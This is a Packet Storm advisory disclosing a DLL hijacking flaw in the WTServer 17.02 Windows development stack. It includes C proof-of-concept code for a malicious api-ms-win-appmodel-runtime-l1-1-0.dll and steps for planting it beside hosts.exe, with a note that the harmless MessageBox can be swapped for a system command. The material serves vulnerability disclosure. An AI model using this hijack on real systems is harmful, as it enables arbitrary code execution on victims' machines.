what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WTServer 17.02 DLL Hijacking

WTServer 17.02 DLL Hijacking
Posted Mar 10, 2017
Authored by Nassim Asrir

WTServer version 17.02 suffers from a dll hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | 42f354f701a039d4b1f5f143f56c2b0fa06cd43c86ae75c3e5c03fa139903414

WTServer 17.02 DLL Hijacking

Change Mirror Download
[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth

Vendor:
===============

http://wtserver.wtriple.com/


Download:
===========

https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory

About Product:
===============

WTServer - Nginx MariaDB Redis Php development stack for Windows

A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.


Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp*

Vulnerability Type:
===================

DLL Loading Arbitrary Code Execution.


Informations:
===================

The "hosts.exe" program is the vulnerable in WTServer and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".


POC:
===================
Download the POC from github and compile it with "CodeBlocks" or "GCC" .

https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b

Data:

// Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll" then copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe"
// For any informations contact me at: wassline@gmail.com

#include "main.h"

#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}


- Download the POC and compile it and copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe" and you will see the MessageBox or you can modify in the code to launch a System Command (calc or ....) .


CVE Reference:
===============

N/A


Tested on:
===============

Windows 7

Win xp




Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close